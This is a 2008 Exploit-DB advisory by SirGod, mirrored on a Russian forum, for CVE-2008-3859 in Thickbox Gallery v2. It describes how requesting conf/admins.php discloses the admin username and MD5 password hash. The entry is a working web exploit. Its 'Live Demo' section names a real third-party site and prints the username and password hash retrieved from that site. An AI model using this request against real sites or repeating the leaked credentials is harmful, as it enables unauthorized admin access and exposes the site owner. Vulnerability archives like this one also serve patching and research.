- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6314
- Проверка EDB
-
- Пройдено
- Автор
- SIRGOD
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-3859
- Дата публикации
- 2008-08-26
Код:
#########################################################################################
[+] Thickbox Gallery v2 Admin Data Disclosure
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,MesSiAH,xZu,HrN,kemrayz
##########################################################################################
[+] Arbitrary Admin Data Disclosure
- Go here and you will see the admin data ( login name + crypted password as MD5 )
http://localhost/[Path]/conf/admins.php
- Admin data :
a:1:{s:5:"admin";s:32:"d73ed8a01f624fcb878296bc7ff302bc";}
- Now extract the admin username and the hash :
Username : admin
Password : d73ed8a01f624fcb878296bc7ff302bc
[+] Live Demo
http://www.davilin.com/tbg/conf/admins.php
- Retrived :
a:1:{s:8:"ytakenak";s:32:"56bd1d32bcb1fbd2609e4d7634febbd1";}
- Name + Password
Username : ytakenak
Password : 56bd1d32bcb1fbd2609e4d7634febbd1
##########################################################################################
# milw0rm.com [2008-08-26]- Источник
- www.exploit-db.com
